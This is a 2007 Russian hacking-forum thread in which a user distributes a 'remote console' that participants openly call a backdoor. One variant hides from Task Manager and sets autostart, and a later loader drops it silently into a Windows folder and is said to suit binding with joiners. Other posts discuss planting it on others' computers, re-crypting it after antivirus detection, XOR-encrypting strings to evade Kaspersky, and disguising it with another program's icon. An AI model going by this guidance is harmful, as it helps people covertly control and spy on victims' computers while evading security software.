Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Защита ОС: вирусы, антивирусы, файрволы. (https://forum.antichat.xyz/forumdisplay.php?f=80)
-   -   Оцените мое творение (https://forum.antichat.xyz/showthread.php?t=39458)

Joker-jar 03.05.2007 19:01

Оцените мое творение
 
Программа состоит из клиента и сервера, представляет собой удаленную консоль (терминальное управление компьютером). Выкладываю впервые. (Special For Antichat, как говорица :))

rmcn.zip

remcon.rar содержит клиент и сервер. Сервер без формы, легко завершается из диспетчера задач.

remcon_t.rar - вариант сервера, который не виден в диспетчере задач, при старте прописывается в автозагрузке (невидим стандартными методами). На своей тачке не запускайте, но если вдруг запустили... завершить можно командой
Код:

taskkill /im remcon.exe /f
а с автозагрузки убрать здесь: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\policies\Explorer\Run

Вид клиента:

http://www.kbrdhook.com/images/screenshots/remcon.jpg

Жду отзывов и предложений.

З.Ы. Скачать расширенную справку по командам консоли Windows

Feshh 09.06.2007 01:38

идея неплохая лови +
тока вот с кодировкой там какой то косяк... вместо нормальных букв какие то буквы зю) поправь )

Joker-jar 09.06.2007 01:52

Это косяк винды. Нужно создать reg файл с таким содержанием:
Код:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Nls\CodePage]
"1250"="c_1251.nls"
"1251"="c_1251.nls"
"1252"="c_1251.nls"
"1253"="c_1251.nls"
"1254"="c_1251.nls"
"1255"="c_1251.nls"

внести в реестр и все станет ОК.

З.Ы. Если что, смогу выложить исходники. Написано на Delphi +KOL

Feshh 09.06.2007 01:55

ок спасибо сделал как ты сказал - теперь все ок ) за за исходники будет отдельный респект ))) так что выкладывай

Alexsize 09.06.2007 12:35

А исходники выложишь?

Joker-jar 09.06.2007 14:36

Выложил исходники (все находится по ссылке в первом посту). Напоминаю, что написано на Delphi + KOL & MCK + WinSock2 (Есть в архиве).

Joker-jar 09.06.2007 15:32

Хех... Добавил в архив еще один вариант сервера - не виден в диспетчере задач, при старте прописывается в автозагрузке (невидим стандартными методами). На своей тачке не запускайте, но если вдруг запустили... завершить можно командой
Код:

taskkill /im remcon.exe /f
а с автозагрузки убрать здесь: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\policies\Explorer\Run

Joker-jar 09.06.2007 19:27

Интересно, как долго это все будет вдали от глаз антивирусов...

GROB_T 09.06.2007 21:09

максимум неделю, если на вирустотал кидать никто не будет (сильно сомневаюсь :) ) возможно дольше

Joker-jar 10.06.2007 10:47

На вирустотал кидать смысла нет, прогу проверило уже достаточное количество человек, доверять можно.

З.Ы. Нужно сканер диапазона сделать многопотоковым, а то медленный он сейчас

sakauri 15.06.2007 15:16

Joker-jar к сожелению твое творение спалил сегодня каспер и AntiVir,Avast,BitDefender,DrWeb,Ikarus,NOD32

-=lebed=- 15.06.2007 15:27

Цитата:

Сообщение от sakauri
Joker-jar к сожелению твое творение спалил сегодня каспер и AntiVir,Avast,BitDefender,DrWeb,Ikarus,NOD32

Наверно кто-то всётаки закачал на вирустотал, автор перекриптовывай своё творение...

Joker-jar 15.06.2007 15:45

Нууу, программа с открытым кодом, думаю, кому надо, справятся ;)

Joker-jar 15.06.2007 15:50

Кстати, на моей практике отучить каспера от домогательств удавалось путем шифрования строк программы банальным ксором (то есть вместо myfunc('строка') использовать myfunc(decrypt('зашифрованная строка'))). В частности, каспер перестал ругаться на одну мою библиотеку после того, как я убрал явно хранящуюся константу tm = 'maskmgr.exe'. Гы

Joker-jar 18.06.2007 01:28

Цитата:

127.0.0.1 - соединено...
127.0.0.1 - отключено
127.0.0.1 - соединено...
LOL. Качай справку по командам командной строки (ссылка в первом посте). А еще, насколько я помню, по-умолчанию в полях прописан путь C:\ и команда dir. Не о чем это не говорило?

Ch3ck 18.06.2007 01:47

Сделал бы обычный Edit1.Text для ввода команд. На кой там ListBox не понимаю. Если бы там уже были забиты команды, то это да. Хотя пока её найдёшь, легче 100 раз напечатать будет.

k1m 18.06.2007 02:06

Хорош Backdoor но такой медленый при скане
кокой там порт открывается?

Joker-jar 18.06.2007 07:11

Порт 1666. Можно сканер сделать многопотоковым, хотя он в принципе не особо нужен. Думаю на неделе заняться новой версией

Joker-jar 18.06.2007 09:27

Кнопку "послать" нажимал?

LeopardSS 18.06.2007 11:18

А у меня глюк с кодировкой, абракодабра

Feshh 18.06.2007 12:41

Цитата:

Сообщение от LeopardSS
А у меня глюк с кодировкой, абракодабра

там в архиве есть reg файл - два раза кликаешь по нему и заносишь данные в реестр. И все - кодировка норм. у меня тоже такое было.

Ch3ck 18.06.2007 12:50

Цитата:

Дайте примеры каких нибудь команд
ppc Вообще.
http://weppc.jino-net.ru/cmd.rar

Dimi4 18.06.2007 13:33

тут ето...вопросик..
RemCon.exe на чужой комп надо один сливать или с Manager.dll

Joker-jar 19.06.2007 03:33

Цитата:

Сообщение от Dimi4
тут ето...вопросик..
RemCon.exe на чужой комп надо один сливать или с Manager.dll

Если хочешь, чтоб не палился в диспетчере, то вместе с библиотекой.
Цитата:

Сообщение от Mosvit
У меня прога вообще не работает

У большинства работает, ищи проблему локально (фаервол, настройка сети и т.д.)

Dimi4 26.06.2007 15:09

Фаервол ловит жаль

Joker-jar 02.08.2007 08:24

http://ifolder.ru/2868078

RemCon Loader. При запуске выгружает RemCon.exe в папку C:\Windows\Web и запускает его. RemCon прописывается в реестре на автозагрузку и скрывает себя из диспетчера задач. При загрузке не выплевывает никаких окон, пригоден для склеивания джойнером. Написано в образовательных целях, использование в незаконных целях запрещено!

Joker-jar 02.08.2007 08:25

Пароль на архив - antichat

dk-ne 04.08.2007 22:21

Палится Nodом.

_SploiT_ 09.08.2007 23:41

Цитата:

Спасибо программа классная, но только пришлось попариться с кодировкой (
А что там париться если Joker-jar сказал как исправить косяк

wedmak_ss 26.09.2007 23:23

извините а как мне иконку на remconloader устанавит

Joker-jar 08.10.2007 12:03

wedmak_ss, джойнь его с какой-нибудь прогой, большинство джойнеров и иконку позволяют указать.


Время: 18:40